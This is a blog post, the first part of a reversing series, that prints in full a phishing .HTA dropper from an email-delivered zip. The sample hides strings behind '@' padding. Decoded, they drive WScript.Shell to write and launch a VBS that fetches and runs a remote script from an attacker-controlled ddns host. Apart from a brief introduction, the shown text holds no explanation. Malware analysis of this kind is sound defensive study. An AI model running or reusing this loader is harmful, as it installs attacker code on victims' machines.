Skip to main content
HashnodeJoan E.S

Command Palette

Search for a command to run...

Reversing an .HTA File - 1

Updated
6 min read
Reversing an .HTA File - 1
J
Joan Esteban
Part of seriesReversing software

We have recently received a URL inside of an email that redirected to a page that downloaded a zip file. Inside this zip file there was a .HTA file.

💡
This file is very simple and is a very good entry point to reversing for anyone interested in learning since we do not have to deal with de-compilers, debuggers and heavily obfuscated binaries.

An HTA file represents an application that contains HTML code and another language compatible with Internet Explorer such as Javascript or VBScript.

The file we received had the following name: YBUKK43344Fac_JDHNXtu01192_raAXTLJ1487818681.HTA

I open the file with a code editor such as Visual Studio Code. Since the code is in HTML and Javascript, opening the file will give us nice looking code. The file looked like this:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title> vS2h9rZwBiMfymyyzxnpnW32</title>
  <hta:application applicationname="RjrF80" scroll="yes" singleinstance="yes">

<script type="text/javascript">
window.moveTo(3162, 3581);
</script>


  <script language="VBScript">

a = InputBox("¿Cuál es la suma de 9 + 3?","Resuelve la pregunta","Respuesta")


    Sub RjrF80()
        msgbox("Error (cod JdtIcnOoxJ32)")
        close
    End Sub
</script>


<script type="text/javascript">
window.moveTo(3162, 3581);
function Vw3eX8X29()
{

var _$_N7nuQ8464=["\x40\x40\x62\x40\x40\x6C\x40\x61\x40\x40\x63\x40\x40\x40\x40\x6B\x40\x69\x40\x40\x6E\x40\x66\x40\x65\x40\x40\x63\x40\x74\x40\x40\x40\x40\x2E\x40\x64\x40\x40\x64\x40\x40\x6E\x40\x40\x73\x2E\x40\x40\x40\x6E\x40\x40\x40\x65\x40\x74","\x40\x57\x40\x40\x53\x40\x40\x40\x63\x40\x40\x40\x72\x40\x40\x69\x40\x40\x40\x70\x40\x40\x40\x74\x40\x2E\x40\x53\x40\x40\x68\x40\x40\x65\x40\x40\x40\x40\x6C\x40\x40\x40\x6C","\x40\x40\x40\x72\x40\x40\x40\x75\x40\x40\x6E","\x40\x40\x40\x40\x63\x40\x40\x40\x6D\x40\x40\x64\x40\x40\x40\x20\x40\x2F\x40\x40\x40\x56\x40\x2F\x40\x40\x44\x40\x2F\x40\x40\x40\x63\x40\x20\x65\x40\x63\x40\x68\x40\x6F\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x74\x40\x40\x40\x20\x40\x40\x40\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x5E\x40\x40\x40\x40\x22\x40\x41\x40\x40\x6D\x40\x40\x40\x68\x40\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x31\x3D\x40\x22\x40\x2E\x40\x40\x40\x40\x22\x40\x3A\x40\x40\x67\x40\x40\x4B\x40\x40\x46\x40\x40\x50\x40\x30\x40\x33\x40\x40\x39\x40\x40\x3D\x40\x40\x40\x40\x22\x40\x40\x69\x22\x40\x40\x3A\x40\x4D\x40\x59\x40\x40\x40\x55\x40\x40\x6E\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x36\x40\x3D\x40\x40\x22\x40\x40\x67\x40\x40\x40\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x40\x30\x40\x3D\x40\x40\x40\x40\x22\x40\x3A\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x40\x65\x40\x40\x74\x40\x4F\x40\x5E\x40\x40\x40\x22\x40\x3E\x40\x40\x40\x25\x40\x40\x70\x40\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x40\x25\x40\x40\x5C\x5C\x40\x40\x40\x53\x4B\x40\x40\x7A\x40\x40\x40\x34\x40\x38\x40\x33\x40\x36\x2E\x40\x40\x40\x76\x40\x40\x62\x40\x73\x40\x40\x40\x26\x40\x65\x40\x40\x40\x63\x40\x40\x40\x40\x68\x40\x40\x40\x40\x6F\x40\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x40\x65\x40\x40\x40\x74\x40\x40\x20\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x40\x40\x5E\x40\x40\x22\x40\x40\x62\x40\x40\x40\x6A\x40\x40\x40\x65\x63\x40\x40\x74\x40\x40\x28\x40\x40\x40\x22\x73\x40\x40\x43\x40\x40\x72\x40\x40\x22\x40\x40\x40\x2B\x40\x40\x67\x40\x4B\x40\x46\x40\x40\x40\x50\x40\x40\x40\x30\x40\x40\x33\x40\x40\x40\x39\x40\x40\x2B\x40\x22\x40\x40\x40\x70\x40\x74\x40\x40\x22\x40\x2B\x40\x40\x47\x40\x40\x40\x6C\x40\x40\x40\x76\x40\x40\x38\x30\x40\x40\x40\x2B\x40\x40\x22\x40\x68\x54\x40\x22\x40\x2B\x40\x40\x22\x54\x40\x70\x40\x40\x40\x40\x73\x40\x22\x40\x40\x40\x40\x2B\x40\x47\x40\x40\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x30\x40\x2B\x40\x22\x2F\x40\x40\x40\x2F\x40\x62\x40\x6C\x61\x40\x40\x63\x6B\x40\x40\x69\x40\x6E\x40\x40\x66\x40\x65\x40\x40\x63\x40\x40\x40\x74\x40\x40\x40\x22\x40\x40\x2B\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x40\x40\x68\x40\x63\x40\x70\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x40\x40\x22\x40\x64\x40\x40\x64\x40\x40\x40\x6E\x73\x40\x40\x22\x40\x40\x2B\x40\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x68\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x22\x40\x6E\x40\x40\x40\x65\x40\x74\x40\x40\x40\x2F\x40\x40\x40\x2F\x40\x22\x40\x40\x2B\x40\x40\x40\x4D\x40\x59\x40\x55\x40\x40\x40\x6E\x40\x40\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x40\x40\x40\x36\x40\x2B\x40\x22\x40\x40\x31\x40\x22\x40\x40\x29\x40\x40\x40\x5E\x40\x22\x40\x40\x3E\x40\x40\x3E\x40\x40\x40\x25\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x25\x40\x40\x40\x5C\x40\x40\x40\x40\x5C\x40\x40\x40\x53\x40\x4B\x40\x40\x7A\x40\x40\x34\x40\x38\x40\x40\x40\x33\x40\x40\x40\x40\x36\x40\x40\x2E\x40\x76\x40\x40\x40\x62\x40\x40\x73\x40\x40\x26\x40\x40\x63\x40\x40\x40\x40\x3A\x40\x40\x5C\x40\x40\x5C\x40\x40\x77\x40\x69\x40\x6E\x40\x40\x64\x40\x40\x40\x6F\x40\x40\x77\x40\x40\x73\x40\x5C\x40\x5C\x40\x40\x73\x40\x40\x79\x40\x40\x73\x40\x40\x40\x40\x74\x40\x40\x40\x40\x65\x40\x40\x40\x6D\x40\x40\x40\x40\x33\x40\x32\x5C\x40\x40\x5C\x40\x40\x40\x63\x40\x6D\x40\x64\x40\x2E\x40\x65\x40\x40\x78\x65\x40\x20\x40\x2F\x40\x63\x40\x40\x20\x40\x40\x73\x40\x74\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x43\x40\x3A\x40\x40\x5C\x40\x5C\x40\x55\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x40\x72\x40\x73\x40\x40\x5C\x40\x40\x5C\x40\x50\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x5C\x40\x40\x5C\x40\x40\x53\x40\x40\x4B\x40\x7A\x40\x40\x34\x40\x40\x38\x40\x40\x33\x40\x40\x40\x36\x40\x2E\x40\x40\x40\x76\x40\x62\x40\x73","\x40\x40\x40\x50\x40\x6F\x40\x40\x70\x40\x40\x75\x40\x40\x40\x70","\x40\x40\x40\x45\x40\x72\x40\x72\x40\x6F\x40\x40\x72\x20\x40\x40\x28\x40\x40\x63\x40\x40\x6F\x40\x40\x64\x40\x40\x40\x20\x40\x25\x40\x40\x73\x40\x40\x40\x72\x40\x61\x40\x40\x6E\x40\x40\x64\x40\x40\x40\x25\x40\x40\x29","\x40\x40\x40\x63\x40\x40\x6D\x40\x40\x40\x64\x40\x40\x20\x40\x40\x2F\x40\x40\x56\x40\x40\x40\x40\x2F\x40\x40\x44\x40\x40\x2F\x40\x40\x40\x40\x63\x40\x40\x20\x40\x40\x73\x40\x40\x74\x40\x40\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x40\x40\x25\x40\x40\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x25\x40\x40\x5C\x40\x5C\x40\x53\x40\x40\x4B\x40\x40\x40\x7A\x40\x34\x40\x38\x40\x33\x40\x40\x40\x36\x40\x40\x2E\x40\x40\x40\x76\x62\x40\x40\x40\x73"]

var yEiZU47 = new ActiveXObject(Bfnq6M43(_$_N7nuQ8464[1]));
yEiZU47[Bfnq6M43(_$_N7nuQ8464[2])](Bfnq6M43(_$_N7nuQ8464[3]),0);

}

function Bfnq6M43(VSxEf79) 
{
var roQ54 = new RegExp('@', 'g');
var AA7ldSL23 = VSxEf79.replace(roQ54, '');
return AA7ldSL23;
}


  </script>



</head>
<body  onload="Vw3eX8X29();RjrF80();"; >

<p class="hidden">TrwqUjO0JsTnq5iDIJGKEYeUJDvKkVfebkBm4NTGyiCi1jGLpwgsgDxjrU6PuGfkPWQIKFoNUp4UwYVGOCFWZ7MxbZgNoHo13v6HkMw70ZBekOcaSEHz1xlb3ogYBMvpohHJPA3dKQ1YEYmnM02vuVSBR2M1zsdZFOEWsKmo6C5dkmDuBoGYGTMfUzWoVKWrpSQzxXRFWcnEhnE4e4A9w4fpydIdw3wcTWfvCe4CYPvpvNTfo9kjPHOiad1E2eWEkJAWMH0RhUD9xBQvj7SHgUunS1pDUnrAnD1Eai2DlY3afC06k3mduvE6vj239AJmKLXUtrP1kR18jeeYgalqKzT2iHV9jyNcIqPvLNUKrHO1quDAycceTXxgwZUbgB8bJYtYaWErvByLemmJVDfsp0j0Cqfbrh3ZfKnn07XrYQG1IyD7FjsA82mrsGPgAzW9wtOcKwnEGVi08faQHbEiF2HMpzb47w7OHVAjlyVaDwYioTlIq20t5dZZI0Nq0hI7JE2SGTMy1cvf6UBTTLvjn61Ds5Ie7V0SmsGvmpkJOLy0Rpxj1MKomzjuNX816OCQyp4wLDkxE9uvyqQij67PaPb3brmAlzfOS0bXOwBWnw184USWA0XWxNPYxnALHM6PqPMBppMbY313eIWeKYxAf0A4LNlJX0sm7oByeHGfRMmRvHVuk7gngbek9ZZb0Gk2uVrHjwvGyYZUsOSHzXhfq27ePkGm7QGsOPmCpEDgCeqDknliDvDliN5a61MA6NPAi5wtMeTk2VnJqgNSsASVdw077vg7ILUO8mMVjSjecFMCuk4iyO9CqqoHShFtW3IldgAvUovb7V8ljKAwBp3PQJ4v2thsX4McbKujxdozpB7rmzFMsfJRSEujRo9Kj0VKPKvHJdrc6wWYapoz7gvLsNOHnFNeSwUCE9lSYk2XtPKBXisSkPrbkyWI2u6zcrzV39jPMpiqlgs1NONa0OVOIBHMXfbRE00dqFVOWZ0dLF0CdFSjffsGutGoH1Ormt7iFYl1FlB4N9gdleTuYeNa40w0vaUXeWP23otk0YBUfLegFofq6D9fYme9duHunGPfTWHjQhxvKycU0ZcG9bCO4dUunBTwhzWksJuE92Ob4dcSAY5rn1AJlbbSfK3XDTbYkgld4kPRFarVCvWhC5P9IxszO4i9KY3MThAK0YA3byEGGB7Vs7y5ymMvsGA30fK1mTaoQATq8XsC1AfAIOniS3r8R1T4hHsepmwatzF1hxykd7ZiNqSxH6yqLE4i3OZRT0ae1aZ6fnlNZJuJhLVK3Rw71WsC3H1m8hGxIIGtzWhftT2SQ1eZZah7o4r0caCxr56bqM3BEh27QQpYLMODxPNiyVmcbpyf0Xhdz0ztuWMni7Vpg5NguMV8bq806lRudLbae3jz6QbYlgzie9PZu3UlndUkvKQlxEBxGWZTudTBpmyqBrI80xlvWTuFodLAOlTBiz3kOd6WCvZskCanWnNfXS7DH2CpDXvjnY5CMVLLQQq27jFykvn17tOY8S3A4tIfma9R7Pyw8mBkUpzSQLHlReQwJqjBeJHkRNw13LlIv7TZ6GMlzDou5uiUhQoeZFeU79byngQ7GqyAUtqNP9d7acN6nAeHl4oC9Hg7fLxvzFvkr9s0YGH9H9ToQPJBiOjQ52GegK44</p> 

<p class="hidden">vm5TS892kHTKy4678BsgtaJ77AmFQaHyKiQ5vGGPaARcTk01bn1zPClsgEt8hXCMXzbjY6XLBqHHCJtemlumS8hnThwV8ZnpoEr5fH75xdgYBSXNajXgYQ5EUHOXtzabtnEC91QygSxFCBPIXnwFkml3C5311aO4fBVuim2GxXOkRNROoyVFWLVHi5L0CYKA3l9hy8bZ0g9wsAQLzrVR8PcHo3aLD6LTbyILwYOZAO04qc7voB89bNVVMeCI9sJrkYzLTuMe1lYESiNQrSqcGJz8GFLtWK2cDFEt5F0vSpvzeUi6LfTqgmPoz0n403Y6ABArqjbgxG1h2hnW0aj1TKKorDMt8v83zKnj91TBjl1T3lsfvEKZwsWq8vUSMdUUK91lCwtkDvdNTHDNrglFMXyX7XZHzSBBV8mJ5FQ7Ke5yRQdUXuOlInk71ZgrzmSwwnhAEYRQLWvCCobSFYI6Kj3Gsf8OqVrcPG7rQa0alRRMBIwVAFLYmd9sxL7NxD2GR3K5f9M9zl1mAQSgl8JsTXrUHIZVh9FSNdtxYSWLA0neO68</p> 

<p class="hidden">G4QgKQCpSSIaX4E8cyM59oC82SflcjOOekJW0zacKvoTiO1xpAbgEYolV1MRdo7K9d37C1jN1xL54WZM8sTATmmZdDZ3TSkRp42hI6wWwowO5RJgjzpckPGHEvHo7y7nI6DTRMqGGePIBtOY4uDpOtYyD00CiAgxyaQ2cYmhGthKbM87bSRd0INmM9rXFYZkxMiY4dVVFXFrFqPRZ5M60sx3gWNhCtJ6k318R4njRGSsUKuEKV112lys1Wfrm500KZBpRACiQWmpRaiSFrslIRupCU5w1lI2JDutYeN4zxBXlX8iuws1RdAboT4NmyUBmWrbwTMbsfc0L0rGOzlI1UL6RkWfsXow38WMFuCFRX8izxejN6ur7q5gFR0VhrxnnaH77Mld6EzrCTaPY6HvedfSr9eVhStKT5RGHFzhIVIyYx3CQcFzArT8XWXG6Did9xEHpNsqkWdjMcf2RarPfXYV9LXfqWj96rkwMfWOGC79qLy5nCdd1L3UsaZBz8g8ge3kM5qcK543H3rLZfEJSImfzkhxyNDp0WPSfInW7glIirNSBjweY0xT8EYRIXuZN9a2c5dM29PQ3pBQ4uYYmxjWPg6GjjGBB5SWUxa5OgBmbwlusX0wgePTXziQLHTIBj1GZhLEjQkb6aqaFK7pP14NbRUgjDcLcg5cvNfiSbDg0vjOHBPLsJap9cPcXFOjQHnMg9n25oc8GtiakdQgtUxqJ83SMg8goDDPsYHvdWN0ayi8ID4n7DQH3YHq28RRZEW2qwZvt4RFhnlO37nvJ9nr9Rp9qXK05G8T0BdGJMCRRhTvjOAU08dRiokAHxS61QBTi74egvqEyb57yV6hWtTYC7vWAlAaiKdnr0avFZyZY3YxCtkqeBTOBaT3Qe5oJbe4upckY1pMbFjrSJUQL73LDZZNKybPede4egGxWXynvWakz3O6rphZZsD6iqZse4MYUiqSN07PB8k9vLpbyXURR5aeVtYNuLgXJhdOftdc75KnyCEEUwo0xvbVeVoIMu5wWGXgYNg3AU302E26aGQIypxVEXHD9UKvxyi95tcNahJfjk0mUxIC0wHj3q9fcDjqePBGSjFD6kFnmgjcQyV7GqN2QmTmhEW2mLRDvCFojfWB3rgDiGdMkGeSEnpSHxqu6ZMrBkGycQvrTPNZ8TiEkglTiJHehMeBLv3FtZfNuzp2zL5yz3pFVkXAkAwIRmKQCoQfacrztkPAoZouGdBu1D3pDmujdytnLSjsJEy77bnQ2HCBkFrctCmosvNkFemz2XEiZEyb4OyyCVSVOt15BNVeOAwmnAtKI6pa3qQafdBExYtgt8YaxBmvt9pH0pnuUzZN7gX1Zz39OECMNQjHzS72whELxVNxGZcq7gIIhvewKOEsr4re0c49xssTnyvn1V1cvmQdgKFxKWJXdeSoEvyYx1lFl2YiHtSUgY5Q4pDsY8bpEp1BCE8xhnD9RrhmAlFyuWh8wSs47nvpdsyJvldvMVbuj1YM0MjQowQQ3IZX2m6XB4Qn5lGH00L0Uey3lIGnAnri9p99JPJzyMnHkftvwOMyJSzUypCy5C03CJJjxcX7dKTRfpMujsjkkP7yRjsdRg2E88b6HSt7t1tcnprZcIF3ceTaBMVijmAWqt7c2mcqtIpt5</p> 

<p class="hidden">w3HB0qmCHFOnjipQ5xStlcariZxYBCaKNPxLr78igLoO0oWR3K3WbtM52HhMongsSOcP9sZuD6k8a2fNfInxKLn92St7uZ1CN3uXtHwWBVLWgMXWn6Nbjt3b637gyAR3f36xrKqJnOzbV4TgOKr0uzwwYS0B5l3nX6zf1rTfcTmhZ3y1vLTrKiQI2fu7TxqhJuHm5ij2coBDM5N0eOXuCVO03qBxlwT131j6YzTTOwzcqzlUfaGj2HkZ9YUh5zLsvLyBmrij2XySjQ0BrVOli563JWVHrzrK3Q0xmeKX3H90</p> 

<p class="hidden">wGuwJhQ3S52rVE9TBasuVfZhY2FgKNc5PQqn754lDPkjZdHK4Hp2CuQdipZ83RRbtGYXFo48Z3GHoX5FrXOUrEjzNR1ExE9OsGWnWpty0yqDZYv3GkWXcQEtI1EsmnqPmVzXdNgdXUV1xuCvoYnS4CIELIAGwpZAtvtoPNkjxkFrJqIfb5EP6N4zlHl7jWm50g0RUC4Q8xlWWbSGDxGOVLCRq5N3jApthNNVL3kl7SW1MYOIVY3cDCfj5IDZhdHX383SWR9orqcdl7KFdQcDuW08Nw8n92bOCDpR6ez8tKEsKm2da9XCnwFIxcvL2RwOA3JgddIqw9eZL73Aw1Uf0R8VJ0Ao12Fg25X2HbvtXB9MpQlYDutnsOew9yi9GWQqVQYE63xtdo7lYZYZT9fbQZeqDtcgVIjYwBVSoHpIdRla13aLjAo2ryvkXHVoWnyyecA5rB7jZLh2ZEqEsNVJ4JKUAIXxvOSVCXCklzGc0Onh6wAfjNefjWQBGZLmXgHC6ABRCseXZhV3ZWyo0tnc1Kz3tQbyPXUUU7HXHbPU3C01Quoiq3bvnRqSBNaP9osRKC60Bz4VCKu78l7SXKN2zP1oSakb6cOM3aU9Cv4BI363NE17BRpnxtcdcCqsNBQnHZXZlu9x6HAVorNGJax0EYM3NUsYgGUfunk3Q4Wfhno2aXUkbN4a570FDneSKxTIS48XeoAmziAqSJPtLH5muBwqcnW3b7tcb15aoRZAVUFmTDWzesekZXIrXRf3M3w22YEdJ75e38nxV0spYLdaNId9xVdxw0TPBE2sYl0XQZZPtIvhzGExM4Answv0gkvd8BZXLGgA5RKB5TAfU7Qgl2aOcrhnku0szyjHo7T4j0Qt7DW0psOj16</p> 

<p class="hidden">GD9J3tUOB0XNnOkgYky6Z0Xxv3ZkMJnPf3xoay7eavFUmXmgz7qwykjljTHpdJOylECYKpi1UnCdFW7JDo4A4tB3MamneAzf46JLDK6DOg5WK4KeWcgJwDMrTubiM6Xa1AfVB4DeMcYaeVtk3HdAAhh2QEJYYa4q3bzqj5eOpNl96ZvaZSllPYRoiLL8kaf5xo3CuubhgZf3lS9r2QeyduFgU4Mk3OVcV5WdmZrkMxthe4CTKpF8ZntYEnvmmcCX3tPoPw39JFzzO4X6bIB6qqaHYpDNf6kRy1ksWBEU72kBFuNaEFDkCsG3y61DelGLPUxv45C0HsL3OpmzPHp5W08YrwjL3z9ulEcXwBKJZgKEnHfAGUI4Np4Xn04S7WNszvdzK4YILdIflsxdstf5aoz2PEEekvE60CKUK91seaBmyvIGIC29LUfe4okIyxS1m2to7xK01FOEV4tXZV67IGYVPmJHJLRlYHkCScrszOdm4vfmGaQsC6zVMCQoJ748</p> 

<p class="hidden">iZBVzBB1ctqXsIxG9u2AH7kUDoedNz5OHcaqTgmPoEu2Egh9Y9ecymH5APf3YoEjpQoibfSCg7Q7aVWEPDgvW8X6U28QwGwhrfTxPcpMx8eOXrVg6lGtPqMjFU5DQOi2UqQhXWz1ZFP6RChfs2uWmDLQ5n5yK3PqqsSsXNN81EYs0mOwOk8ChRLJFWE0YBLYw8Vh6FYb3B587YAlnncxEK7wSRx2WfXRKe3k0jRhMmoTFUNtgGXtsW14ZpuaAKBNpswoaKxmzQPZOYenBmeZxHxiNhrc7hTxPcU7nIcJydyrMiu76d4SGqZMPTG9bnhSCboTewVTvvkZAxmWtg2eHmkR4i8wPoc4ianpOxDkmzL1aD492E3ppFH85Np7BAXIrcV5ZE2wSWpykNVuwuQvBhlLawkxHOQyykAoyIJnA4R0Yb5DdQqMxckXQX6ATWbaPQEdZy3D5ZxZ4fUdvBNVej7V5XHLLE4gvNIGIlB5fkgUuMSRZSzF6Wn1BiJqwOgoYSJ2cZclGIq3hA9gUu1wMkfzJ5s6FP458tHJQFGWfI3b2rmr9MT6uL0HPSqbvDjtTOsj1rffw4VttGP2yjajo9RxVbrqybFOpkNCkDoncDaho9MP3Cvc89nbgABzRSfRNBQZcwGAbSexiYriVTE06Q2mUg0fmNtx1PyrEgixFXnlzGj5S7rNcfMKEh4EcxZ0r0Wa3yi9gawwObkFaWYvPUuaRs6nC2QHhhWwRb3M58YEGb2pFxYlRVVjr5mg3c99</p> 

<p class="hidden">kC1jLp6fTKL0367RIkOBpZlwiO8YSd4KLWPtAUqpIkRX5mkgHnqE7sIVbbpEMHBDpt0Bc21Z8ToxLhgPjRJPdURNp9bXMTdsGktcUEHcNzqiEBI52ByIn8KetnSFtTW3X4cqENuwbxZsdpPy12gngBnf9AaxUrBQjmZ9RlXGYPByxNwOeD3Fl3bWBaaMslGwmCbSQSxFx39azBWgHqnwagSNQniPzQ32JzVH4vaf7YB9kaKuNHUEZMBS70GdEC6XYJT8qSyrIGU5pIWTpwyePEMvMy2JSiizdkSGHXyAVzQOqsYj3rNplynwUGoY0t3xLAXEym6p8HcWkgZ8D2ef61Jy6RNWTfsC4R3yhFNqNBgGcH6K4Qm4b4UrONQXwiU1YcoGooYaQPfATcNLVGYyqN0RfnAmXqjcSoj7x9etgXPpFS9y83R0Yzs9xyzWRGvQtgTFmD8v382qvR1Y659We0fllgaM4FbOUyHDAi5OVgMi5HbWrV2XBFkNpBLEWBFhXRZWaymgP6sBLMvq0DmnLgyG0089oEgYQAKJRieZn8S6SvGE4m0EQJYxDdRMIdtJMbA352uktJRhz0xya3sM88W63knYqDrDjui63TLfojC4Ty4vT05ekBLUQVectXYFEPOYzh5nx1l45wX69YPaAYn3YyCLshDJIlvuZCvOxjvlz9SvbhkkXaPtjevyl1KvkH2um2Y68pLRLB34zDntKUkERkWbDbPCfQzHpGNtFVKfJuaqFxPIwneRNTLnRokUSvR3TeELcLb0HSegZ3OWIV99b81pSJWtRzHaMbNUvDlB9bhS0nNjdwJrBsUXUBeb8DwyDZHUyN0LfCcFzi14RjSjIV79K78nEJpxSY9ZEfPmYIwP8Og7kp1Rf9SzX1rnkTqF6JCLOAGTbOWF56</p> 

<p class="hidden">pp6WM6Gi65o4B9fTSo0jjL2UKwlWvhUSOeQ2DBMLqnTZiSIpC3snH0Lb0OX4zFZVAwS3wu4mVnVxXIQGOkMSADdibVV9vqit6OSu4O6TaqtGHAH5aGpZnwcGhSQoqARdJNuXoXLeyP4fTrPNsXiiG8x8le1FoJrEZwIVPLNU5cE8h5VXUNALJDSkNwhy2Lu7upP4QdM63PLBkRFPF8FJDokFMHkPvvbe8ZHL8EQlfKpOY8nr5Oi4eJOvhLuOPQuMiTbaiwMwainHfoNtTdiBa98i77sptyl3Wx2DYUB5rZeWmClpjwH67WLceizOTDA23jj9aDG4dMHmSJQXNCi0xlZLA0gyYggDYL0g8IjttgXbwUwnEhRSDOz3e44CrJbROy2OOLZ6iGfxzcxyI20hO81eCBnvM0ScSYIwmYaK6akHPEbTbxGlh1vDGGblbQWqWdC1ZLPE86PdBd4nub3kJUE8PjNZPskep8XHiAp5sjnsAniXQACJHfXhEZx6340Ko6bLtPt1Ly4KQ5TaOPLFS9wrWAyj6Gdx6s2HeguXpCrGEHZUhDrzDSIT9J95WoSdx972pCP26NKD88U9Vx6wzgqWNEiyHr8xYjsBWhGW5txrWOFthMSfBFbdtuMHUbbtdKq8b0Bs9iHMngOjQcmKaGvd3pcqrQJr4ZW4ifw3kP5ZJjGmyaOqNBrOcREhuxxToPPOWmcA4nl2B7TWI5cPEeHZWiHOwHkucCc5lt1wHECXOqMfnWVaXoMYp3SmKKmFI0N0jHAfvPO0NMpBI7NxapDnyCidOd1Cbs4aSlYmZ0KqacwLKvrHmuWPdFHiuPMx1aQDmVUQ5BURLYLrnyo3VIV5ZxDYVpWuSuAga0oCK3Rl6zcsJCIRF8vVkAGQYFhWeg3XqKUpfgmaZL3PDtDWdcasDa3tDkkJwwoiQ7OTyzYryzc0VPl36HfF0Mdlu6uCCe3UAYq6czBjJtlwDDtFN1F146dnmlMUJEySLedtR0R62uKoHFuE42P0LudEcNKxT70roobaIgoxa6bUXRj6dVEeYYTWhaAni3YRBa4gPAZ5f0iEohQ9s87epjSTW595U4hwUb4u4L0mvo4xXDCSBCcTN83La486A2YSRhBWbHYQikrBduXFY1vfkEaCeFIMjkJljrshstYhlJH33vpocaWMYr5PYHZXhOMcDcK1AKTzqLsRQz9CoISecbd1PguQszjWneQteg4EQbtB4nOCm488yUQBBdjziH46shZ7QyphOY4k0JD3MVvcIcSvGTSkDskruSstsLu7aI8nvwrMQ11UThWYeo0sXcdyNlLwclDofiDZN6FTQ1klv9RfSZAZ2hjZCqo8X9AvTBwG6UtrxpRcGZGmP0sxcK6hzEdodqrLuAR1XwdCiszuFxUTebRWlQ8BxcwrABjDOzT5cv47Dy8EfHTlLFx0DLNVcG36f3Z0DNUAwwiq7MquZ5KSWvGCZBuR1ZrTcTiZpCkLuFfeUjVTrty2hfIzjDG7HgQ0LFx8UXN6wSdymaa2sWFy58S5lsblBSawTVeBfwY7oZn75YiC3rfdy5Y2DR4zr6Hq10</p> 

<p class="hidden">Tn0InV8xgEnILd4nmCSHcwDOg3Cnm5PttNP6X3tM4vckxs6jnXe5YeXMWHoFcrpLJu0qbuduII9y9pdoQaJhDtmRfRHCvOSbXlEftUijVSlJtI1gJ4CPvCCfZT9wWQa3dWvktVR3Gg6Ru7DFBHyGMwEHFmRMwNd8DJPNVfwuSimZBnM4wa1J02xdvTuclGgHK1Imt048n68ZkxVBITTsPyBPLDyVvnllbKVjsa0qQDJOmo88zF9pZYNroAHFIB3TK8Qqmhsg8VRlHOPkejmigTpiIgt5iU7oNqjFE72YbYwFeV8J6sHzr1gE1XKwPB7fvnzjkZihJxY7aFUr1YNEvDCTsYV07XFVSeUJLjcwINNjVDcGvMip7jYurjtXWcI3meydXLCzOyEUdviF1uTmj3KUXzEzkgPCAjXGHitPOTdBKtvRaWEToRs6yury7kMMe0hbkkpXj6NZv58PSpjknhkYPVMgjKsy1RTOY6URI9LBqygvPTASNdUXvXPQZXzv8sBPl2q33scQVWwyNDDqqA4XuCziIkCpKSYyuGZRBAQyrJEcVlLi7CzeGnXmSk6sIDkraculiqV6Q55wEVO4Zn0CF2ix2DDfxAa0R1g5cbhkmb8r2EeIPgbdkDjNbPQvc6lXCwzywOsuaKzv55</p> 

<p class="hidden">r2UQk0vPf9uRmJQpNYMPszkeGWZA0XzMPHl7syxbDF4tu8PVDse44dRNCrk3a4vgtbGvlW8TqlYSIK35XQ1qtepLe1XCOJBE7KkoqdhUkfguWmFpmexGT4rVAM799W0LKEgLTTVPNq9XlG1YwK86ZBmCG05CGlnqhTSiG7eYTr0DJRqIs9eh3ZhdkgZMvZmlDXqa0ulZtzpWQdGa3S5S6j8m6i2TtzJUaTCJncpJ6RrufcFxwwHsefZGQ29dfnopcxqhlvhVeRPM74MdtEEpx5uZ0zMgRV9C9RffQQeT0fY1Pe2kbckh5cn68ophTHI6gvwzJLmMFV826</p> 

<p class="hidden">eb2xr66shtuxozkwltONZTmak7HaYUASK4fF1yEEajGzsKQ1iIE11q2abh13pOBfa3ecWiW0LOD7ZRTTK8gg2cJHKFfILVmtWi0FT6VxGDkinE4K0UKHhDAu6iBs2RfnDVGoouFnuqNjV7Lts4dsWoLtnZbfziTl08ZfW8BuanKvZfjtID6h3vBtmnXVhlgbXr7DaG7ZntcfEvjevS20kptKWnqUzrquqULpb8StljHvz5qHi1D81wqURoO1HTSvCPqGkDhQBa3gSuVAg4Juy20QeR4EyTGgYG2P2Yk1u8e8gYTrS7OZqeqd9JUix4eKNj3gZlW2MfzKXPlvu9HOZUpDr0rDcTpMOruIDeROg8G0KW1LvTImH9UcCvMkEkPWqNCeIvENXnwJ3JKIP5F9W9mtEuTrvNNurDLJIPcvXdiYrEiLa1KrkEsw8vNB05tXRocCTcUu7mJOt2gjsM3zSeKOJ3h0j5Z6LXQsfOdIG1boJEcUQZ94ba7jEQwSAhUZKnNalzrzTLB75o8BZ1ElUF18uB2GqdcBd8rkcgg1F6ixWBmSurwHP7K9iDhocljDOgyVsNICRfD0DkC4BMB90udvHHeYkdpsniyioZs73DmRNltsqJlLyE1vh7eAzADfTxKAe8ol5Mg3sHQj24yg9dQUsxlIYy3DdTUgZG2l8NiYSKzHdF4Y7hOXZIKSQXaMvndn4DzrOxrehL00hVw2NNSC5vUnGnZMUIf9FY97PyUar7MN0s6HfsB5xWH